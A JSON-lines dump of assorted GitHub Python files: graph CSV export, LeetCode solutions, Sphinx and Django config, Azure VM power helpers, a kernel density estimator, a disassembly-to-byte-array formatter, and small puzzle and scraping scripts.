csv.writer(edges_file, delimiter=delimiter)\r\n writer.writerow(['source', 'target'] + G._edge_attr)\r\n for source, neighbourhood in G._adj.items():\r\n for target, attr in neighbourhood.items():\r\n writer.writerow([source, target]+attr) \r\n\r\n with open(f'{path}/vertices.csv', mode='r', newline='') as vertices_file:\r\n writer = csv.writer(vertices_file, delimiter=delimiter)\r\n writer.writerow(['vertex'] + G._vert_attr)\r\n for vertex, attr in G._adj.items():\r\n writer.writerow([source]+attr)","repo_name":"bsulyok/graphx","sub_path":"graphx/readwrite/csv.py","file_name":"csv.py","file_ext":"py","file_size_in_byte":3659,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"52095979246","text":"class Solution:\n def nextGreaterElement(self, nums1: List[int], nums2: List[int]) -> List[int]:\n greater_dict = {}\n\n stack = [nums2[0]]\n\n for i in range(1, len(nums2)):\n while(stack and nums2[i] > stack[-1]):\n greater_dict[stack.pop()] = nums2[i]\n stack.append(nums2[i])\n\n for j in stack:\n greater_dict[j] = -1\n\n return [greater_dict[i] for i in 
nums1]\n","repo_name":"ibsa21/A2SV-practise-questions","sub_path":"Week 6/day 5/next_greater_number.py","file_name":"next_greater_number.py","file_ext":"py","file_size_in_byte":439,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"25676499232","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nextensions = [\n \"sphinx.ext.autodoc\",\n \"sphinx.ext.autosummary\",\n \"sphinx.ext.napoleon\",\n \"sphinx.ext.coverage\",\n \"sphinx.ext.doctest\",\n \"sphinx.ext.extlinks\",\n \"sphinx.ext.ifconfig\",\n \"sphinx.ext.todo\",\n \"sphinx.ext.viewcode\",\n]\nsource_suffix = \".rst\"\nmaster_doc = \"index\"\nproject = \"TimeThese\"\nyear = \"2020\"\nauthor = \"Joachim W. Bargsten\"\ncopyright = \"{0}, {1}\".format(year, author)\nversion = release = \"0.0.7\"\n\npygments_style = \"trac\"\ntemplates_path = [\".\"]\nextlinks = {\n \"issue\": (\"https://github.com/jwbargsten/python-timethese/issues/%s\", \"#\"),\n \"pr\": (\"https://github.com/jwbargsten/python-timethese/pull/%s\", \"PR #\"),\n}\n\nhtml_use_smartypants = True\nhtml_last_updated_fmt = \"%b %d, %Y\"\nhtml_split_index = False\nhtml_sidebars = {\n \"**\": [\"searchbox.html\", \"globaltoc.html\", \"sourcelink.html\"],\n}\nhtml_short_title = \"%s-%s\" % (project, version)\n\nnapoleon_use_ivar = True\nnapoleon_use_rtype = False\nnapoleon_use_param = False\n","repo_name":"jwbargsten/python-timethese","sub_path":"docs/conf.py","file_name":"conf.py","file_ext":"py","file_size_in_byte":1031,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"23294641521","text":"from typing import List\r\nclass Solution:\r\n def maxEnvelopes(self, envelopes: List[List[int]]) -> int:\r\n if not envelopes:\r\n return 0\r\n n=len(envelopes)\r\n envelopes.sort()\r\n dp=[1]*n\r\n for i in range(n):\r\n for j in range(i):\r\n if envelopes[i][0]>envelopes[j][0] and envelopes[i][1]>envelopes[j][1]:\r\n dp[i]=max(dp[i],dp[j]+1)\r\n print(dp[i])\r\n num=max(dp)\r\n return num\r\na=Solution()\r\n\r\nprint(a.maxEnvelopes([[1,2],[1,3],[5,6],[3,4]]))\r\n\r\n# Dynamic programming.\r\n# class Solution:\r\n# def lengthOfLIS(self, nums: List[int]) -> int:\r\n# if not nums: return 0\r\n# dp = [1] * len(nums)\r\n# for i in range(len(nums)):\r\n# for j in range(i):\r\n# if nums[j] < nums[i]: # 如果要求非严格递增,将此行 '<' 改为 '<=' 即可。\r\n# dp[i] = max(dp[i], dp[j] + 1)\r\n# print(dp[i],i)\r\n# return max(dp)\r\n# a=Solution()\r\n#\r\n# print(a.lengthOfLIS(nums = [10,9,2,5,3,7,101,18]))","repo_name":"wudale111/leecode","sub_path":"src/动态规划/书本叠放.py","file_name":"书本叠放.py","file_ext":"py","file_size_in_byte":1094,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"5215979944","text":"#!/usr/bin/env python\n# encoding: utf-8\n\"\"\"\n@author: wushaohong\n@time: 2020/9/29 下午6:21\n\"\"\"\n\"\"\"345. 
反转字符串中的元音字母\n编写一个函数,以字符串作为输入,反转该字符串中的元音字母。\n\n示例 1:\n\n输入:\"hello\"\n输出:\"holle\"\n示例 2:\n\n输入:\"leetcode\"\n输出:\"leotcede\"\n \n提示:\n\n元音字母不包含字母 \"y\" 。\n\"\"\"\n\n\nclass Solution:\n def reverseVowels(self, s: str) -> str:\n yu = set('aeiouAEIOU')\n # s=list(s)\n i = 0\n j = len(s) - 1\n while i < j:\n while s[i] not in yu and i < j:\n i += 1\n while s[j] not in yu and i < j:\n j -= 1\n if i >= j:\n break\n s = s[:i] + s[j] + s[i + 1:j] + s[i] + s[j + 1:]\n i += 1\n j -= 1\n return s\n\n\nif __name__ == '__main__':\n sol = Solution()\n print(sol.reverseVowels('leetcode'))\n","repo_name":"hshrimp/letecode_for_me","sub_path":"letecode/241-360/341-360/345.py","file_name":"345.py","file_ext":"py","file_size_in_byte":937,"program_lang":"python","lang":"zh","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"8398107379","text":"from django.urls import path\r\nfrom food.views import *\r\n\r\nurlpatterns = [\r\n path('foodinput', inputfood, name=\"input\"),\r\n path('test/', test, name=\"test\"),\r\n path('find', test2, name=\"test2\"),\r\n path('test3/', test3, name=\"test3\"),\r\n path('session_end/', session_end, name=\"session_end\"),\r\n path('session_in/', session_in, name=\"session_in\"),\r\n\r\n]\r\n","repo_name":"csangh94/Django_projcet","sub_path":"gym_project/food/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":367,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"70897062409","text":"\"\"\"Create and manage virtual machines.\"\"\"\n\nimport traceback\n\nfrom azure.mgmt.compute import ComputeManagementClient\nfrom azure.identity import ClientSecretCredential\nfrom msrestazure.azure_exceptions import CloudError\nfrom config import GROUP_NAME, VM_NAME, SUBSCRIPTION_ID, TENANT_ID, CLIENT_ID, CLIENT_SECRET\n\n\ndef get_credentials():\n subscription_id = SUBSCRIPTION_ID\n credentials = ClientSecretCredential(\n tenant_id=TENANT_ID,\n client_id=CLIENT_ID,\n client_secret=CLIENT_SECRET\n )\n return credentials, subscription_id\n\n\ndef start_vm(vm_number):\n \"\"\"Virtual Machine management example.\"\"\"\n #\n # Create all clients with an Application (service principal) token provider\n #\n credentials, subscription_id = get_credentials()\n # resource_client = ResourceManagementClient(credentials, subscription_id)\n compute_client = ComputeManagementClient(credentials, subscription_id)\n # network_client = NetworkManagementClient(credentials, subscription_id)\n\n ###########\n # Prepare #\n ###########\n\n try:\n\n # Start the VM\n print('\\nStart VM')\n async_vm_start = compute_client.virtual_machines.begin_start(\n GROUP_NAME, VM_NAME[vm_number])\n async_vm_start.wait()\n\n except CloudError:\n print('A VM operation failed:\\n{}'.format(traceback.format_exc()))\n return False\n else:\n print('All example operations completed successfully!')\n return True\n finally:\n pass\n\n\ndef stop_vm(vm_number):\n \"\"\"Virtual Machine management example.\"\"\"\n #\n # Create all clients with an Application (service principal) token provider\n #\n credentials, subscription_id = get_credentials()\n # resource_client = ResourceManagementClient(credentials, subscription_id)\n compute_client = ComputeManagementClient(credentials, subscription_id)\n # network_client = NetworkManagementClient(credentials, subscription_id)\n\n ###########\n # Prepare #\n ###########\n\n try:\n\n # Stop the VM\n\n print('\\nStop VM')\n async_vm_stop = compute_client.virtual_machines.begin_power_off(\n GROUP_NAME, 
VM_NAME[vm_number])\n async_vm_stop.wait()\n\n print('\\nDeallocate VM')\n async_vm_deallocate = compute_client.virtual_machines.begin_deallocate(\n GROUP_NAME, VM_NAME[vm_number])\n async_vm_deallocate.wait()\n\n except CloudError:\n print('A VM operation failed:\\n{}'.format(traceback.format_exc()))\n return False\n else:\n print('All example operations completed successfully!')\n return True\n\n\nif __name__ == \"__main__\":\n start_vm()\n","repo_name":"hangrycookie/cloud-gaming-portal","sub_path":"api/vm.py","file_name":"vm.py","file_ext":"py","file_size_in_byte":2655,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"16"} +{"seq_id":"10788791264","text":"import numpy as np\nfrom scipy.special import erf\nfrom scipy.stats import gaussian_kde\n\nclass Bounded_kde(gaussian_kde):\n r\"\"\"Represents a one-dimensional Gaussian kernel density estimator\n for a probability distribution function that exists on a bounded\n domain.\"\"\"\n\n def __init__(self, pts, low=None, high=None, *args, **kwargs):\n \"\"\"Initialize with the given bounds. Either ``low`` or\n ``high`` may be ``None`` if the bounds are one-sided. Extra\n parameters are passed to :class:`gaussian_kde`.\n\n :param low: The lower domain boundary.\n\n :param high: The upper domain boundary.\"\"\"\n pts = np.atleast_1d(pts)\n\n assert pts.ndim == 1, 'Bounded_kde can only be one-dimensional'\n \n super(Bounded_kde, self).__init__(pts, *args, **kwargs)\n\n self._low = low\n self._high = high\n\n @property\n def low(self):\n \"\"\"The lower bound of the domain.\"\"\"\n return self._low\n\n @property\n def high(self):\n \"\"\"The upper bound of the domain.\"\"\"\n return self._high\n\n def evaluate(self, xs):\n \"\"\"Return an estimate of the density evaluated at the given\n points.\"\"\"\n xs = np.atleast_1d(xs)\n assert xs.ndim == 1, 'points must be one-dimensional'\n\n pdf = super(Bounded_kde, self).evaluate(xs)\n\n if self.low is not None:\n pdf += super(Bounded_kde, self).evaluate(2.0*self.low - xs)\n\n if self.high is not None:\n pdf += super(Bounded_kde, self).evaluate(2.0*self.high - xs)\n\n return pdf\n\n __call__ = evaluate\n","repo_name":"farr/plotutils","sub_path":"plotutils/bounded_kde.py","file_name":"bounded_kde.py","file_ext":"py","file_size_in_byte":1593,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"16"} +{"seq_id":"6225916420","text":"import re\n\n\ninputstring = \\\n\"\"\"\nvolatile void stump(void) {\n\tchar a = 0;\n88 44 24 24 mov byte ptr [rsp+24h],al\n\tchar b = 0;\n88 44 24 25 mov byte ptr [rsp+25h],al\n\n\t__asm {\n\t\tmov rax, [a];\n48 8A 44 24 24 mov al,byte ptr [rsp+24h]\n\t\tmov rbx, [b];\n48 8A 5C 24 25 mov bl,byte ptr [rsp+25h]\n\t\tmov [b], rax;\n48 88 44 24 25 mov byte ptr [rsp+25h],al\n\t\tmov [a], rbx;\n48 88 5C 24 24 mov byte ptr [rsp+24h],bl\n\tstump();\n}\n\"\"\"\n\noutput = \\\n\"\"\"\nBYTE shellcode[{bytes}] = {{\\n\\\n{byte_block}\n}};\n\"\"\"\n\ncontent = \"\"\n\nregex = r\"^([0-9,A-F ]{2,})(.*)\"\n\n\nreg = re.compile(regex, re.MULTILINE)\n\n\nlines = reg.findall(inputstring)\nprint(inputstring)\n\nblock = ''\nnumber_of_bytes = 0\nfor line in lines:\n print(line)\n formatted_line = '\\t'\n bytes_on_line = line[0].strip().split(' ')\n number_of_bytes += len(bytes_on_line)\n for opcode in line[0].strip().split(' '):\n formatted_line += '0x' + str(opcode) + ', '\n formatted_line += \" \"*((60 - len(bytes_on_line)*6)) + \"//\" + line[1].strip() + '\\n'\n block += 
formatted_line\n\n\nprint(output.format(bytes=number_of_bytes,byte_block=block))","repo_name":"N0K0/pytomatic","sub_path":"pytomatic/beta_tools/shelly.py","file_name":"shelly.py","file_ext":"py","file_size_in_byte":1175,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"16"} +{"seq_id":"32256239418","text":"\ndef main():\n somme = 0\n for i in range(1, 1001):\n somme += number_letter_count(i)\n print(somme)\n\n\nNUMBERS_LETTERS = {\n 0: 'zero',\n 1: 'one',\n 2: 'two',\n 3: 'three',\n 4: 'four',\n 5: 'five',\n 6: 'six',\n 7: 'seven',\n 8: 'eight',\n 9: 'nine',\n 10: 'ten',\n 11: 'eleven',\n 12: 'twelve',\n 13: 'thirteen',\n 14: 'fourteen',\n 15: 'fifteen',\n 16: 'sixteen',\n 17: 'seventeen',\n 18: 'eighteen',\n 19: 'nineteen',\n 20: 'twenty',\n 30: 'thirty',\n 40: 'forty',\n 50: 'fifty',\n 60: 'sixty',\n 70: 'seventy',\n 80: 'eighty',\n 90: 'ninety',\n 100: 'onehundred',\n 1000: 'onethousand',\n}\n\n\n\ndef number_letter_count(num: int) -> int :\n global NUMBERS_LETTERS\n if num in NUMBERS_LETTERS:\n return len(NUMBERS_LETTERS[num])\n\n number = str(num)\n hundreds, tens, ones = '', '', ''\n\n for i in range (len(number)):\n digit = int(number[i])\n if digit == 0:\n continue\n\n if len(number) - i == 3: # hundreds\n hundreds = NUMBERS_LETTERS[digit] + ' hundred and '\n elif len(number) - i == 2: # tens\n if digit != 1:\n tens = NUMBERS_LETTERS[digit * 10] \n else:\n tens = NUMBERS_LETTERS[digit * 10 + int(number[i+1])]\n break\n elif len(number) - i == 1: # ones\n ones = NUMBERS_LETTERS[digit]\n\n word = hundreds + tens + ones\n if word[-4:] == 'and ':\n word = word[:-4]\n return len(word) - word.count(' ')\n \n\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"mounirmelzi/project-euler-solutions","sub_path":"17.py","file_name":"17.py","file_ext":"py","file_size_in_byte":1584,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"21072160922","text":"\n# y =wx + b \n# w , b 변수로 두고 x,y는 입력되는 값이므로 placeholder로\n\nimport tensorflow as tf\ntf.compat.v1.set_random_seed(66)\n\n# x_train = [1,2,3]\n# y_train = [1,2,3]\n\nx_train =tf.compat.v1.placeholder(tf.float32, shape=[None])\ny_train =tf.compat.v1.placeholder(tf.float32, shape=[None])\n\n\n# W = tf.Variable(1, dtype=tf.float32) \n# b = tf.Variable(1, dtype=tf.float32) \n\n\nW = tf.Variable(tf.compat.v1.random_normal([1]), dtype=tf.float32) \nb = tf.Variable(tf.compat.v1.random_normal([1]), dtype=tf.float32) \n\nhypothesis = x_train *W +b\n#hypothesis 얘랑 f(x) 즉 y이랑 같은 말임! 
=f(x) = wx +b\n\nloss = tf.reduce_mean(tf.square(hypothesis - y_train)) # mse\n# ==> 평균(제곱(예측값 -실제값))\n\noptimizer = tf.compat.v1.train.GradientDescentOptimizer(learning_rate=0.01)\ntrain = optimizer.minimize(loss)\n\n###########################여기까지가 연산할 수 있는 그래프 모양만 만든것이다###################3333\n\nsess = tf.compat.v1.Session()\nsess.run(tf.global_variables_initializer()) #위에 선언한 변수때문에\n\nfor step in range(2001):\n _, loss_val,W_val, b_val = sess.run([train, loss,W,b], \n feed_dict={x_train:[1,2,3],y_train:[1,2,3]})\n #실행하는 부분에서 feed를 먹이고 그값이 여러가지들이 실행되는 곳에서 적용\n if step % 20 ==0:\n # print(step, sess.run(loss), sess.run(W),sess.run(b))\n print(step, loss_val,W_val, b_val)\n\nprint('끗')\n","repo_name":"wonjunchoi-arc/tensorflow1","sub_path":"TF114/tf08_1_plcaeholder(Placeholder써서 완성하기!).py","file_name":"tf08_1_plcaeholder(Placeholder써서 완성하기!).py","file_ext":"py","file_size_in_byte":1454,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"12141968674","text":"\"\"\"\nrandomize.py\n\nDit algoritme kiest een willekeurige negatief of positief getal tussen de lengte van het bord - 1. Dit getal representeert een beweging.\n\n\"\"\"\n\nimport os, random, time\nfrom code.classes.game import Game\nfrom code.classes.board import Board\nfrom code.helpers.show_results import show_results\nfrom code.helpers.random_move import random_move\n\ndef randomize(board):\n\n start_time = time.time()\n cars = board.cars.copy()\n current_board = board.board.copy()\n\n steps_list = []\n\n while board.won(current_board) == False:\n\n # generate random car + move\n move = random.choice(list(range(-board.size + 1, board.size - 1)))\n car = random.choice(cars)\n move_car = board.move_car(cars, car, move)\n\n # if move is valid\n if move_car is not False:\n\n # update cars and board, append move to steps\n cars = move_car[0]\n current_board = move_car[1]\n steps_list.append([(car[0], move), current_board])\n\n # measure the time this function has taken to run\n elapsed_time = round(time.time() - start_time, 4)\n\n return board, steps_list, elapsed_time, cars\n","repo_name":"Karim-1/RushHour","sub_path":"code/algorithms/randomize.py","file_name":"randomize.py","file_ext":"py","file_size_in_byte":1157,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"19821951052","text":"import random\n\n\nroot = ['Ab', 'A', 'A#',\n 'Bb', 'B',\n 'C', 'C#',\n 'Db', 'D', 'D#',\n 'Eb', 'E',\n 'F', 'F#',\n 'Gb', 'G', 'G#']\n\nchord = ['',\n 'm',\n 'Maj6',\n 'Maj7',\n 'm6',\n 'm7',\n '7',\n 'sus4']\n\ndef generateChord():\n chosenRoot = random.choice(root)\n chosenChord = random.choice(chord)\n return chosenRoot+chosenChord\n\nprint()\n#print('Play: ' + generateChord()+ ' (in 2 positions)')\nprint()\n\n","repo_name":"kungfusaini/MusicScripts","sub_path":"giveChord.py","file_name":"giveChord.py","file_ext":"py","file_size_in_byte":508,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"15022853860","text":"# author: Chao Chen\n# UNI: cc3736\n\nimport nltk\nimport time\nimport math\nimport logging\n\nlogging.basicConfig(level=logging.INFO, format='%(asctime)s - %(levelname)s - %(message)s')\n\n\n# a function that calculates unigram, bigram, and trigram probabilities\n#brown is a python list of the sentences\n#this function outputs three python dictionaries, where the key is a tuple expressing the ngram and the value is the log probability of that ngram\n#make sure to 
return three separate lists: one for each ngram\ndef calc_probabilities(brown):\n # Three dictionaries used to record the numbers of ngrams in the paragraphs.\n unigram_n = {}\n bigram_n = {}\n trigram_n = {}\n\n uni_denominator = 0\n\n for sentence in brown:\n sentence += \"STOP \"\n tokens = nltk.word_tokenize(sentence) # Type = List\n uni_denominator += tokens.__len__() # Denominator used by unigram\n for token in tokens:\n if (token,) in unigram_n:\n unigram_n[(token,)] += 1\n else:\n unigram_n[(token,)] = 1\n tokens.insert(0, \"*\")\n bigram_tuples = tuple(nltk.bigrams(tokens))\n for one_tuple in bigram_tuples:\n if one_tuple in bigram_n:\n bigram_n[one_tuple] += 1\n else:\n bigram_n[one_tuple] = 1\n tokens.insert(0, \"*\")\n trigram_tuples = tuple(nltk.trigrams(tokens))\n for one_tuple in trigram_tuples:\n if one_tuple in trigram_n:\n trigram_n[one_tuple] += 1\n else:\n trigram_n[one_tuple] = 1\n\n unigram_p = {item[0]: math.log(float(item[1]) / uni_denominator, 2) for item in unigram_n.items()}\n unigram_n[(\"*\",)] = brown.__len__()\n bigram_p = {item[0]: math.log(float(item[1]) / unigram_n[(item[0][0],)], 2) for item in bigram_n.items()}\n bigram_n[(\"*\", \"*\")] = brown.__len__()\n trigram_p = {item[0]: math.log(float(item[1]) / bigram_n[(item[0][0], item[0][1])], 2) for item in\n trigram_n.items()}\n return unigram_p, bigram_p, trigram_p\n\n\n#each ngram is a python dictionary where keys are a tuple expressing the ngram, and the value is the log probability of that ngram\ndef q1_output(unigrams, bigrams, trigrams):\n #output probabilities\n outfile = open('A1.txt', 'w')\n for unigram in unigrams:\n outfile.write('UNIGRAM ' + unigram[0] + ' ' + str(unigrams[unigram]) + '\\n')\n for bigram in bigrams:\n outfile.write('BIGRAM ' + bigram[0] + ' ' + bigram[1] + ' ' + str(bigrams[bigram]) + '\\n')\n for trigram in trigrams:\n outfile.write(\n 'TRIGRAM ' + trigram[0] + ' ' + trigram[1] + ' ' + trigram[2] + ' ' + str(trigrams[trigram]) + '\\n')\n outfile.close()\n\n\n#a function that calculates scores for every sentence\n#ngram_p is the python dictionary of probabilities\n#n is the size of the ngram\n#data is the set of sentences to score\n#this function must return a python list of scores, where the first element is the score of the first sentence, etc. 
\ndef score(ngram_p, n, data):\n scores = []\n if n == 1:\n for sentence in data:\n line_score = 0\n sentence += \"STOP \"\n unigram_tokens = nltk.word_tokenize(sentence)\n for token in unigram_tokens:\n line_score += ngram_p[(token,)]\n scores.append(line_score)\n elif n == 2:\n for sentence in data:\n line_score = 0\n sentence = \"* \" + sentence + \"STOP \"\n bigram_tuples = tuple(nltk.bigrams(nltk.word_tokenize(sentence)))\n for bigram in bigram_tuples:\n line_score += ngram_p[bigram]\n scores.append(line_score)\n elif n == 3:\n for sentence in data:\n line_score = 0\n sentence = \"* * \" + sentence + \"STOP \"\n trigra_tuples = tuple(nltk.trigrams(nltk.word_tokenize(sentence)))\n for trigram in trigra_tuples:\n line_score += ngram_p[trigram]\n scores.append(line_score)\n return scores\n\n\n#this function outputs the score output of score()\n#scores is a python list of scores, and filename is the output file name\ndef score_output(scores, filename):\n outfile = open(filename, 'w')\n for score in scores:\n outfile.write(str(score) + '\\n')\n outfile.close()\n\n\n#this function scores brown data with a linearly interpolated model\n#each ngram argument is a python dictionary where the keys are tuples that express an ngram and the value is the log probability of that ngram\n#like score(), this function returns a python list of scores\ndef linearscore(unigrams, bigrams, trigrams, brown):\n scores = []\n for sentence in brown:\n line_score = 0\n sentence += \"STOP \"\n unigram_tokens = nltk.word_tokenize(sentence)\n bigram_tokens = nltk.word_tokenize(sentence)\n bigram_tokens.insert(0, \"*\")\n bigram_tuples = tuple(nltk.bigrams(bigram_tokens))\n bigram_tokens.insert(0, \"*\")\n trigram_tuples = tuple(nltk.trigrams(bigram_tokens))\n for i in xrange(unigram_tokens.__len__()):\n uni_score = 2 ** unigrams[(unigram_tokens[i],)] if (unigram_tokens[i],) in unigrams else 0\n bi_score = 2 ** bigrams[bigram_tuples[i]] if bigram_tuples[i] in bigrams else 0\n tri_score = 2 ** trigrams[trigram_tuples[i]] if trigram_tuples[i] in trigrams else 0\n if uni_score == 0 and bi_score == 0 and tri_score == 0:\n line_score = -1000\n break\n else:\n line_score += math.log(1.0 / 3, 2) + math.log(uni_score + bi_score + tri_score, 2)\n scores.append(line_score)\n return scores\n\n\ndef main():\n ts0 = time.time()\n logging.info(\"Processing A1: calculate probabilities.\")\n\n #open data\n infile = open('Brown_train.txt', 'r')\n brown = infile.readlines()\n infile.close()\n\n #calculate ngram probabilities (question 1)\n unigrams, bigrams, trigrams = calc_probabilities(brown)\n\n #question 1 output\n q1_output(unigrams, bigrams, trigrams)\n\n ts1 = time.time()\n logging.info(\"Time cost for A1: \" + str(ts1 - ts0))\n logging.info(\"Processing A2: score brown training data with uni-/bi-/trigrams.\")\n\n #score sentences (question 2)\n uniscores = score(unigrams, 1, brown)\n biscores = score(bigrams, 2, brown)\n triscores = score(trigrams, 3, brown)\n\n #question 2 output\n score_output(uniscores, 'A2.uni.txt')\n score_output(biscores, 'A2.bi.txt')\n score_output(triscores, 'A2.tri.txt')\n\n ts2 = time.time()\n logging.info(\"Time cost for A2: \" + str(ts2 - ts1))\n logging.info(\"Processing A3: Linear interpolation for brown training data.\")\n\n #linear interpolation (question 3)\n linearscores = linearscore(unigrams, bigrams, trigrams, brown)\n\n #question 3 output\n score_output(linearscores, 'A3.txt')\n\n ts3 = time.time()\n logging.info(\"Time cost for A3: \" + str(ts3 - ts2))\n logging.info(\"Processing A5: 
Linear interpolation for Sample1 and Sample2.\")\n\n #open Sample1 and Sample2 (question 5)\n infile = open('Sample1.txt', 'r')\n sample1 = infile.readlines()\n infile.close()\n infile = open('Sample2.txt', 'r')\n sample2 = infile.readlines()\n infile.close()\n\n #score the samples\n sample1scores = linearscore(unigrams, bigrams, trigrams, sample1)\n sample2scores = linearscore(unigrams, bigrams, trigrams, sample2)\n\n #question 5 output\n score_output(sample1scores, 'Sample1_scored.txt')\n score_output(sample2scores, 'Sample2_scored.txt')\n\n ts4 = time.time()\n logging.info(\"Time cost for A5: \" + str(ts4 - ts3))\n logging.info(\"Total time cost for Part A: \" + str(ts4 - ts0))\n\n\nif __name__ == \"__main__\": main()\n","repo_name":"chenchao9208/Natural_Language_Processing","sub_path":"Assignment 1/submission/solutionsA.py","file_name":"solutionsA.py","file_ext":"py","file_size_in_byte":7704,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"31300659963","text":"from workers.data_scraper.scraper_dormitory.parser_tools.tools import *\r\n'''\r\n Table Header Warning\r\n CHANNEL_URL : https://www.buk.daegu.kr/index.do?menu_link=/icms/bbs/selectBoardList.do&menu_id=00000196&bbsId=BBSMSTR_000000001052&bbsTyCode=BBST01&bbsAttrbCode=BBSA03&nttId=0&pageIndex=1\r\n Input Table Header : ['번호', '제목', '담당부서', '등록일', '첨부', '조회']\r\n Page Table Header : ['Serial Number', 'Notice Subject', '담당부서', 'Date Created', '첨부', 'Views']\r\n'''\r\ndef post_list_parsing_process(**params):\r\n target_key_info = {\r\n 'multiple_type' : ['post_url', 'is_going_on', 'post_title']\r\n }\r\n var, soup, key_list, _ = html_type_default_setting(params, target_key_info)\r\n lec_list = extract_children_tag(soup, 'div', is_child_multiple=True, child_tag_attrs={'class':'lec_list'})\r\n for lec in lec_list:\r\n a_tag = extract_children_tag(lec, 'a')\r\n href = extract_attrs(a_tag, 'href')\r\n var['post_url'].append(\r\n var['post_url_frame'] + href\r\n )\r\n var['post_title'].append(\r\n extract_text_from_single_tag(lec, 'p', child_tag_attrs={'class':'le_name'})\r\n )\r\n a_tag_text = extract_text(a_tag)\r\n if '접수마감' in a_tag_text:\r\n var['is_going_on'].append(False)\r\n else :\r\n print(var['channel_code'], 'is_going_on 확인 필요')\r\n var['is_going_on'].append(True)\r\n result = merge_var_to_dict(key_list, var)\r\n return result\r\n\r\ndef post_content_parsing_process(**params):\r\n target_key_info = {\r\n 'multiple_type' : ['extra_info']\r\n }\r\n var, soup, key_list, _ = html_type_default_setting(params, target_key_info)\r\n tbody = extract_children_tag(soup, 'tbody', child_tag_attrs={'class':'Thead'})\r\n tmp_meta_data = extract_children_tag(tbody, 'th', is_child_multiple=True)\r\n extra_info = {'info_title':'프로그램 소개'}\r\n for meta_data in tmp_meta_data:\r\n meta_data_name = extract_text(meta_data)\r\n meta_data_value = extract_text(find_next_tag(meta_data))\r\n extra_info.update({f'info_{len(extra_info)}' : (meta_data_name, meta_data_value)})\r\n var['extra_info'].append(extra_info)\r\n result = convert_merged_list_to_dict(key_list, var)\r\n return result\r\n\r\n","repo_name":"choiseulong/chancewave_scraping","sub_path":"scrapingProject/workers/data_scraper/scraper_dormitory/rooms/daegu/dgbukgu/parser_2.py","file_name":"parser_2.py","file_ext":"py","file_size_in_byte":2297,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"5321045967","text":"# 10875. 
뱀 2023-06-07\n\n\nL = int(input())\nN = int(input())\nx, y = 0, 0\nlines = []\nd_list = [(1, 0), (0, 1), (-1, 0), (0, -1)]\nd = 0\nt = 0\n\nfor k in range(N + 1):\n if k == N:\n l, dd = 3 * L, 0\n else:\n l, dd = input().split()\n l = int(l)\n dx, dy = d_list[d]\n nx, ny = x + dx * l, y + dy * l\n type = d % 2 # 0 이면 가로줄, 1이면 세로줄\n new_line = (min(x, nx), min(y, ny), max(x, nx), max(y, ny), type)\n\n dt = 3 * L\n if type == 0 and (new_line[0] < -L or new_line[2] > L):\n dt = L + 1 - x if d == 0 else x + L + 1\n elif type == 1 and (new_line[1] < -L or new_line[3] > L):\n dt = L + 1 - y if d == 1 else y + L + 1\n for line in lines[:-1]:\n if type == 1:\n if line[4] == 1:\n if line[0] != new_line[0]: continue\n if line[3] < new_line[1] or line[1] > new_line[3]: continue\n dt = min(dt, abs(y - line[1]), abs(y - line[3]))\n else:\n if not (new_line[1] <= line[1] <= new_line[3]): continue\n if not (line[0] <= new_line[0] <= line[2]): continue\n dt = min(dt, abs(y - line[1]))\n else:\n if line[4] == 1:\n if not (line[1] <= new_line[1] <= line[3]): continue\n if not (new_line[0] <= line[0] <= new_line[2]): continue\n dt = min(dt, abs(x - line[0]))\n else:\n if line[1] != new_line[1]: continue\n if line[2] < new_line[0] or line[0] > new_line[2]: continue\n dt = min(dt, abs(x - line[0]), abs(x - line[2]))\n if dt != 3 * L:\n print(t + dt)\n exit(0)\n lines.append(new_line)\n \n x += dx * l\n y += dy * l\n t += l\n d = (d + (1 if dd == 'L' else -1)) % 4","repo_name":"MoCCo329/algo_solving","sub_path":"BEAKJOON/10875.py","file_name":"10875.py","file_ext":"py","file_size_in_byte":1779,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"29367198252","text":"from os import linesep\nimport re\n\n# Saves a adjacency matrix to a file\ndef graph_to_file(W, filename):\n filecontent = \"\"\n for i in range (0, len(W)):\n for j in range (0, len(W)):\n filecontent += str(W[i][j]) + ' '\n filecontent = filecontent.rstrip(' ')\n filecontent += linesep\n filecontent = filecontent.rstrip(linesep)\n try:\n with open(filename, 'w') as text_file:\n text_file.write(filecontent)\n except:\n raise\n\n# Reads a adjacency matrix from a file\ndef file_to_graph(filename):\n # Convert list of strings to list of integers\n def strListToint(ls):\n return [int(i) for i in ls]\n pattern = re.compile(r'\\s+')\n try:\n with open(filename) as input_file:\n lines = []\n for line in input_file:\n # Check if line is empty\n if re.sub(pattern, '', line) == '':\n # Stop reading from input file\n break\n else:\n # Add line to inputed lines\n lines.append(line.rstrip(linesep))\n W = [strListToint(line.split(' ')) for line in lines]\n except:\n raise\n return 